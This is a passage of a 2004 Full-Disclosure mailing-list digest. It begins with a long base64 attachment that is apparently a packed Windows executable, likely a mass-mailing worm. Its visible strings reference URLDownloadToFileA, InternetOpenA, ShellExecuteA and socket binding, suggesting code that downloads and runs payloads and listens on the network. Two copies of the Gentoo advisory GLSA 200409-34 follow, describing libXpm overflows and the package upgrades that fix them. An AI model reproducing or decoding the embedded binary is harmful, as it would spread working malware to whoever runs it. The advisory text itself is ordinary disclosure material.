> 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
> YekEbP//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAMAAAAgAACADgAAAGAAAIAAAAAA
> AAAAAAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAFAAAACk8AAA6AIAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAABAAEAAAB4AACAAAAAAAAAAAAAAAAAAAABAAAAAACQAAAA
> kPMAABQAAAAAAAAAAAAAAKDAAAAoAAAAIAAAAEAAAAABAAQAAAAAAIACAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAICAgADAwMAAAAD/AAD/AAAA//8A
> /wAAAP8A/wD//wAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHd3d3
> d3d3AAAAAAAAAAAAB4iIiIiIhwAAAAAAAAAAAAc4iDM4iDcAAAAAAAAAAAAHs4MAA4OHAAAA
> AAAAAAAAB/8w/7A4hwAAAAAAAAAAAAe4D7//A4cAAAAAAAAAAAAHgL//v/A3AAAAAAAAAAAA
> Bw//v/+/AwAAAAAAAAAAAAf/v/+//7AAAAAAAAAAAAAHd3d3d3d3AAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////
> ////////////////////////////////////////////////////////////////////////
> ////////gAH//4AB//+AAf//gAH//4AB//+AAf//gAH//4AB//+AAf//gAH//4AB////////
> //////////+IwwAAAAABAAEAICAQAAEABADoAgAAAQAAAAAAAAAAAAAAAADY9AAAgPQAAAAA
> AAAAAAAAAAAAAOX0AACQ9AAAAAAAAAAAAAAAAAAA8vQAAJj0AAAAAAAAAAAAAAAAAAD89AAA
> oPQAAAAAAAAAAAAAAAAAAAb1AACo9AAAAAAAAAAAAAAAAAAAEvUAALD0AAAAAAAAAAAAAAAA
> AAAe9QAAuPQAAAAAAAAAAAAAAAAAACn1AADA9AAAAAAAAAAAAAAAAAAANPUAAMj0AAAAAAAA
> AAAAAAAAAABA9QAA0PQAAAAAAAAAAAAAAAAAAAAAAAAAAAAATPUAAFr1AABq9QAAAAAAAHj1
> AAAAAAAAhvUAAAAAAACQ9QAAAAAAAJ71AAAAAAAArvUAAAAAAAC49QAAAAAAAMz1AAAAAAAA
> 2PUAAAAAAADo9QAAAAAAAEtFUk5FTDMyLkRMTABhZHZhcGkzMi5kbGwAZ2RpMzIuZGxsAG9s
> ZTMyLmRsbABTSEVMTDMyLmRsbABzaGx3YXBpLmRsbAB1cmxtb24uZGxsAHVzZXIzMi5kbGwA
> d2luaW5ldC5kbGwAd3NvY2szMi5kbGwAAABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNz
> AABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3NlS2V5AAAARGVsZXRlREMAAENvSW5pdGlhbGl6ZQAA
> U2hlbGxFeGVjdXRlQQAAAFN0ckR1cEEAAABVUkxEb3dubG9hZFRvRmlsZUEAAHdzcHJpbnRm
> QQAAAEludGVybmV0T3BlbkEAAABiaW5kAAAAAAAAAAAAAAAAAAAAAAAAarlfniVax2t8t1uc
> XI5nvGp5vmA0phl0P2CpmCEjKEVBqsexWRhJEy9lsBmCX0zGshCuUxWpVyypnYW3Qwaqt3Mi
> nUiiOXMxc1NAxRBYES91WHxPHXgVxauCOB1QopqyQFGLEX29fnyye2krvHYagMWrpnwLnFeK
> RbSKEC22k0iydLtPpUpjcEy0J8axYYSte7IfjCWtrbjCDLFmF3GKQVcgwFAGmmJzQTIsbhOw
> nsNBDAs3cU51pARZpYZ9badcbXlEmbIcEK89NbPDfLuNYyW0qjc1BohnbsG8S6UQRJ9siAEn
> uG5WXRt/q1GLQpqjWKazVEzAqYajhAWxkkurtncHoaMwqDGatllGfUMiP00POSCCu0tcDWWZ
> vGQpIrudlHZYCZYeUHNAfkO3rW+BXbpNmUdIC2ZPHCXBw1UAP4pULplSbJVSLxoOkwI5dVd5
> RlOlDZlFS3IxP7phmZ2AXZaoDVZ1hgwatqMlIzkyOndumxN9D0BeNAKudyqiOQDFaypHh6m4
> MgNHDloKbKEEkaV6tQ6voX4fFIO6tEI1KERFTXERW8YeWx8eq6uolSyfTJqDl3F2e30pG2A3
> cp9/E4ZAtTRZx3oJNwGaHsBImzmylaRAfK6LiQ4Cr09hoLVaU3UVJjakqxMFb28Hv5dorjpI
> jJJJT4ZFjwsCPEkcVGmqSYJgtcBaCKJKqDuXVza6e6NSQaEEmzoKBYs3XL6LDHSXIxlnjYFO
> mqM+MqketDctiy2p
>
> ----------tthzhwewredcturxosqp--
>
> --__--__--
>
> Message: 15
> Date: Mon, 27 Sep 2004 11:44:23 +0200
> From: Thierry Carrez <koon@...too.org>
> Organization: Gentoo Linux
> To: gentoo-announce@...too.org
> CC: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com,
> security-alerts@...uxsecurity.com
> Subject: [Full-Disclosure] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in
> libXpm
>
> This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
> --------------enigEA6620FABBD9968E5B2250AD
> Content-Type: text/plain; charset=ISO-8859-1
> Content-Transfer-Encoding: 7bit
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Gentoo Linux Security Advisory GLSA 200409-34
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Severity: Normal
> Title: X.org, XFree86: Integer and stack overflows in libXpm
> Date: September 27, 2004
> Bugs: #64152
> ID: 200409-34
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> libXpm, the X Pixmap library that is a part of the X Window System,
> contains multiple stack and integer overflows that may allow a
> carefully-crafted XPM file to crash applications linked against
> libXpm, potentially allowing the execution of arbitrary code.
>
> Background
> ==========
>
> XFree86 and X.org are both implementations of the X Window System.
>
> Affected packages
> =================
>
> -------------------------------------------------------------------
> Package / Vulnerable / Unaffected
> -------------------------------------------------------------------
> 1 x11-base/xorg-x11 < 6.7.0-r2 *>= 6.7.0-r2
> == 6.8.0 >= 6.8.0-r1
> 2 x11-base/xfree < 4.3.0-r7 >= 4.3.0-r7
> -------------------------------------------------------------------
> # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users.
>
> NOTE: Any packages listed without architecture tags apply to all
> architectures...
> -------------------------------------------------------------------
> NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64,
> MIPS, PPC and SPARC architectures: XFree86 users on those
> architectures should switch to X.org rather than upgrading
> XFree86.
> -------------------------------------------------------------------
> 2 affected packages
> -------------------------------------------------------------------
>
> Description
> ===========
>
> Chris Evans has discovered multiple integer and stack overflow
> vulnerabilities in the X Pixmap library, libXpm, which is a part of the
> X Window System. These overflows can be exploited by the execution of a
> malicious XPM file, which can crash applications that are dependent on
> libXpm.
>
> Impact
> ======
>
> A carefully-crafted XPM file could crash applications that are linked
> against libXpm, potentially allowing the execution of arbitrary code
> with the privileges of the user running the application.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> All X.org users should upgrade to the latest version:
>
> # emerge sync
>
> # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2"
> # emerge ">=x11-base/xorg-x11-6.7.0-r2"
>
> All XFree86 users should upgrade to the latest version:
>
> # emerge sync
>
> # emerge -pv ">=x11-base/xfree-4.3.0-r7"
> # emerge ">=x11-base/xfree-4.3.0-r7"
>
> Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS,
> PPC and SPARC architectures: XFree86 users on those architectures
> should switch to X.org rather than upgrading XFree86.
>
> References
> ==========
>
> [ 1 ] X.org Security Advisory
> http://freedesktop.org/pipermail/xorg/2004-September/003196.html
> [ 2 ] X11R6.8.1 Release Notes
> http://freedesktop.org/pipermail/xorg/2004-September/003172.html
> [ 3 ] CAN-2004-0687
> http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687
> [ 4 ] CAN-2004-0688
> http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
> http://security.gentoo.org/glsa/glsa-200409-34.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users machines is of utmost
> importance to us. Any security concerns should be addressed to
> security@...too.org or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2004 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/1.0
>
> --------------enigEA6620FABBD9968E5B2250AD
> Content-Type: application/pgp-signature; name="signature.asc"
> Content-Description: OpenPGP digital signature
> Content-Disposition: attachment; filename="signature.asc"
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (GNU/Linux)
>
> iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS
> oxM9KaPNaz3q7G2WAXIvbrg=
> =OQU0
> -----END PGP SIGNATURE-----
>
> --------------enigEA6620FABBD9968E5B2250AD--
>
> --__--__--
>
> Message: 16
> Date: Mon, 27 Sep 2004 11:44:23 +0200
> From: Thierry Carrez <koon@...too.org>
> Organization: Gentoo Linux
> Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com,
> security-alerts@...uxsecurity.com
> To: andreas.zuercher@...ma.ch
> Subject: [Full-Disclosure] [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in
> libXpm
>
> This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
> --------------enigEA6620FABBD9968E5B2250AD
> Content-Type: text/plain; charset=ISO-8859-1
> Content-Transfer-Encoding: 7bit
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Gentoo Linux Security Advisory GLSA 200409-34
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Severity: Normal
> Title: X.org, XFree86: Integer and stack overflows in libXpm
> Date: September 27, 2004
> Bugs: #64152
> ID: 200409-34
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> libXpm, the X Pixmap library that is a part of the X Window System,
> contains multiple stack and integer overflows that may allow a
> carefully-crafted XPM file to crash applications linked against
> libXpm, potentially allowing the execution of arbitrary code.
>
> Background
> ==========
>
> XFree86 and X.org are both implementations of the X Window System.
>
> Affected packages
> =================
>
> -------------------------------------------------------------------
> Package / Vulnerable / Unaffected
> -------------------------------------------------------------------
> 1 x11-base/xorg-x11 < 6.7.0-r2 *>= 6.7.0-r2
> == 6.8.0 >= 6.8.0-r1
> 2 x11-base/xfree < 4.3.0-r7 >= 4.3.0-r7
